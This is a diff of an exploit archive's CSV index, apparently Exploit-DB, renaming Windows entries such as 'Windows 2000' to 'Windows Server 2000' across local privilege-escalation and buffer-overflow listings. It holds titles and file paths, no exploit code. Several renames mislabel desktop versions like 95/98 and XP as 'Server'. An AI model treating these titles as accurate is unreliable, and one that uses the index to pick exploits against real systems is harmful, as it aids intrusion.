 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Stack Overflow",2010-01-21,cr4wl3r,windows,local,0
@@ -6904,7 +6906,7 @@ id,file,description,date,author,platform,type,port
 18143,platforms/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)",2011-11-22,Metasploit,windows,local,0
 18147,platforms/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,linux,local,0
 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local,0
-18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0
+18176,platforms/windows/local/18176.py,"Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0
 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow SEH Exploit (Metasploit)",2011-11-30,Rh0,windows,local,0
 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0
 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0
@@ -7271,7 +7273,7 @@ id,file,description,date,author,platform,type,port
 19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0
 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0 / qpopper 2.52/2.53 - 'EUIDL' Format String Input",2000-05-24,Prizm,linux,local,0
 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0
-19968,platforms/windows/local/19968.c,"Microsoft Windows 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0
+19968,platforms/windows/local/19968.c,"Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0
 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow",2000-05-29,noir,linux,local,0
 19970,platforms/linux/local/19970.c,"KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0
 19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - (ELM) Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0
@@ -7315,7 +7317,7 @@ id,file,description,date,author,platform,type,port
 20128,platforms/irix/local/20128.c,"IRIX 6.5.x - dmplay Buffer Overflow",2000-08-02,"Last Stage of Delirium",irix,local,0
 20129,platforms/irix/local/20129.c,"IRIX 6.2/6.3 lpstat - Buffer Overflow",1998-11-01,"Last Stage of Delirium",irix,local,0
 20130,platforms/irix/local/20130.c,"IRIX 6.5.x - inpview Race Condition",2000-01-01,"Last Stage of Delirium",irix,local,0
-20133,platforms/windows/local/20133.cpp,"Microsoft Windows 2000 - Named Pipes Predictability",2000-08-01,Maceo,windows,local,0
+20133,platforms/windows/local/20133.cpp,"Microsoft Windows Server 2000 - Named Pipes Predictability",2000-08-01,Maceo,windows,local,0
 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",irix,local,0
 20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail Exploit",1997-09-01,"Last Stage of Delirium",irix,local,0
 20141,platforms/linux/local/20141.pl,"SUIDPerl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local,0
@@ -7336,12 +7338,12 @@ id,file,description,date,author,platform,type,port
 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local,0
 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan Unprivileged read",2000-09-06,"Dixie Flatline",unix,local,0
 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver - Privilege Escalation",2012-08-02,anonymous,linux,local,0
-20209,platforms/windows/local/20209.cpp,"Microsoft Windows 2000 - Still Image Service Privilege Escalation",2000-09-06,dildog,windows,local,0
+20209,platforms/windows/local/20209.cpp,"Microsoft Windows Server 2000 - Still Image Service Privilege Escalation",2000-09-06,dildog,windows,local,0
 20212,platforms/unix/local/20212.c,"GNOME esound 0.2.19 - Unix Domain Socket Race Condition",2000-08-31,"Kris Kennaway",unix,local,0
 20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",aix,local,0
 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0
 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0
-20232,platforms/windows/local/20232.cpp,"Microsoft Windows 2000/NT 4 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0
+20232,platforms/windows/local/20232.cpp,"Microsoft Windows Server 2000/NT 4 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0
 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,palm_os,local,0
 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0
 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0
@@ -7458,7 +7460,7 @@ id,file,description,date,author,platform,type,port
 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0
 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0
 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0
-20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local,0
+20880,platforms/windows/local/20880.c,"Microsoft Windows Server 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local,0
 20885,platforms/solaris/local/20885.c,"Solaris 8 mailtool - Buffer Overflow",2001-06-01,51,solaris,local,0
 20897,platforms/linux/local/20897.sh,"Debian 2.1/2.2 - Man Cache File Creation",2001-06-01,jenggo,linux,local,0
 20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation",2001-05-18,jenggo,linux,local,0
@@ -7505,7 +7507,7 @@ id,file,description,date,author,platform,type,port
 21061,platforms/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,linux,local,0
 21062,platforms/linux/local/21062.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (3)",2001-08-17,"Lucian Hudin",linux,local,0
 21063,platforms/linux/local/21063.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (4)",2001-08-17,"RoMaN SoFt",linux,local,0
-21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 - RunAs Service Named Pipe Hijacking",2001-12-11,Camisade,windows,local,0
+21069,platforms/windows/local/21069.c,"Microsoft Windows Server 2000 - RunAs Service Named Pipe Hijacking",2001-12-11,Camisade,windows,local,0
 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 - Insecure Password",2001-08-15,"Macintosh Security",osx,local,0
 21071,platforms/windows/local/21071.c,"Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
 21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation",2001-08-15,"Digital Offense",windows,local,0
@@ -7548,7 +7550,7 @@ id,file,description,date,author,platform,type,port
 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0
 21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0
 21248,platforms/linux/local/21248.txt,"(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0
-21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0
+21258,platforms/linux/local/21258.bat,"Microsoft Windows Server 2000/NT 4 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0
 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local,0
 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0
 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0
@@ -7564,7 +7566,7 @@ id,file,description,date,author,platform,type,port
 21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0
 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0
 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0
-21344,platforms/windows/local/21344.txt,"Microsoft Windows 2000 / NT 4.0 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0
+21344,platforms/windows/local/21344.txt,"Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0
 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local,0
 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0
 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0
@@ -7621,14 +7623,14 @@ id,file,description,date,author,platform,type,port
 40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0
-21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
+21684,platforms/windows/local/21684.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
-21685,platforms/windows/local/21685.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0
+21685,platforms/windows/local/21685.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0
-21686,platforms/windows/local/21686.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0
+21686,platforms/windows/local/21686.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0
-21687,platforms/windows/local/21687.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0
+21687,platforms/windows/local/21687.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0
-21688,platforms/windows/local/21688.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0
+21688,platforms/windows/local/21688.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0
-21689,platforms/windows/local/21689.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0
+21689,platforms/windows/local/21689.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0
-21690,platforms/windows/local/21690.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0
+21690,platforms/windows/local/21690.txt,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0
-21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0
+21691,platforms/windows/local/21691.txt,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0
 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0
 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0
 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0
@@ -7671,8 +7673,8 @@ id,file,description,date,author,platform,type,port
 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0
 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0
 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0
-21922,platforms/windows/local/21922.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0
+21922,platforms/windows/local/21922.c,"Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0
-21923,platforms/windows/local/21923.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0
+21923,platforms/windows/local/21923.c,"Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0
 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0
 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0
 21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local,0
@@ -7713,7 +7715,7 @@ id,file,description,date,author,platform,type,port
 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0
 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
 22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0
-22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
+22354,platforms/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",linux,local,0
 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0
@@ -7722,7 +7724,7 @@ id,file,description,date,author,platform,type,port
 22456,platforms/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 - Symbolic Link Following Configuration File",2003-04-03,"Carl Livitt",linux,local,0
 22458,platforms/linux/local/22458.c,"Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence",2003-04-04,"Andrew Griffiths",linux,local,0
 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 - Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0
-22528,platforms/windows/local/22528.c,"Microsoft Windows 2000 - RegEdit.exe Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0
+22528,platforms/windows/local/22528.c,"Microsoft Windows Server 2000 - RegEdit.exe Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0
 22531,platforms/linux/local/22531.pl,"SAP Database 7.3/7.4 - SDBINST Race Condition",2003-04-23,"Larry W. Cashdollar",linux,local,0
 22538,platforms/linux/local/22538.pl,"Libopt.a 3.1x - Error Logging Buffer Overflow (2)",2003-04-24,jlanthea,linux,local,0
 22540,platforms/linux/local/22540.c,"Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",linux,local,0
@@ -7780,8 +7782,8 @@ id,file,description,date,author,platform,type,port
 22863,platforms/linux/local/22863.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,linux,local,0
 22870,platforms/windows/local/22870.txt,"Microsoft Windows XP/2000 - RunDLL32.exe Buffer Overflow",2003-07-06,"Rick Patel",windows,local,0
 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 - Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0
-22882,platforms/windows/local/22882.c,"Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local,0
+22882,platforms/windows/local/22882.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local,0
-22883,platforms/windows/local/22883.c,"Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,windows,local,0
+22883,platforms/windows/local/22883.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,windows,local,0
 22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 - HOME Environment Variable Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0
 22911,platforms/php/local/22911.php,"PHP 4.3.x - Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",php,local,0
 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation",2003-07-16,kf,unix,local,0
@@ -7878,7 +7880,7 @@ id,file,description,date,author,platform,type,port
 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0
 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0
 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0
-23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0
+23989,platforms/windows/local/23989.c,"Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0
 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0
 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0
 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0
@@ -7897,7 +7899,7 @@ id,file,description,date,author,platform,type,port
 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0
 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0
 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0
-24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0
+24277,platforms/windows/local/24277.c,"Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0
 24278,platforms/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local,0
 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0
 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0
@@ -7976,7 +7978,7 @@ id,file,description,date,author,platform,type,port
 40389,platforms/windows/local/40389.php,"PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow",2016-09-19,"Yakir Wizman",windows,local,0
 25883,platforms/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 - Field SEH based Buffer Overflow",2013-06-02,xis_one,windows,local,0
 25896,platforms/solaris/local/25896.pl,"Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local,0
-25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0
+25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0
 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite",2005-07-06,pi3ki31ny,linux,local,0
 25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
@@ -7985,7 +7987,7 @@ id,file,description,date,author,platform,type,port
 26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
 26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
-26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",windows,local,0
+26222,platforms/windows/local/26222.c,"Microsoft Windows Server 2000/2003/XP - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",windows,local,0
 26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' Buffer Overflow (SEH)",2013-06-17,Onying,windows,local,0
 26245,platforms/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0
 26321,platforms/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",linux,local,0
@@ -8108,7 +8110,7 @@ id,file,description,date,author,platform,type,port
 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0
 29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local,0
-29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
+29630,platforms/windows/local/29630.c,"Microsoft Windows Server 2003/XP - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
 30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0
 29695,platforms/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass",2007-03-01,"Matousec Transparent security",windows,local,0
 29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - PHP.INI File Modification",2007-03-03,"Stefan Esser",php,local,0
@@ -8221,13 +8223,13 @@ id,file,description,date,author,platform,type,port
 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Privilege Escalation",2009-03-10,"Sun Microsystems",linux,local,0
 32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0
-32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
+32891,platforms/windows/local/32891.txt,"Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
-32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
+32892,platforms/windows/local/32892.txt,"Microsoft Windows Server 2003/XP - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0
 32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0
-33012,platforms/windows/local/33012.c,"Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
+33012,platforms/windows/local/33012.c,"Microsoft Windows Server 2000/2003/XP - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
 33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0
 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0
@@ -8237,7 +8239,7 @@ id,file,description,date,author,platform,type,port
 33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - 'pipe.c' Privilege Escalation (2)",2009-11-03,"teach & xipe",linux,local,0
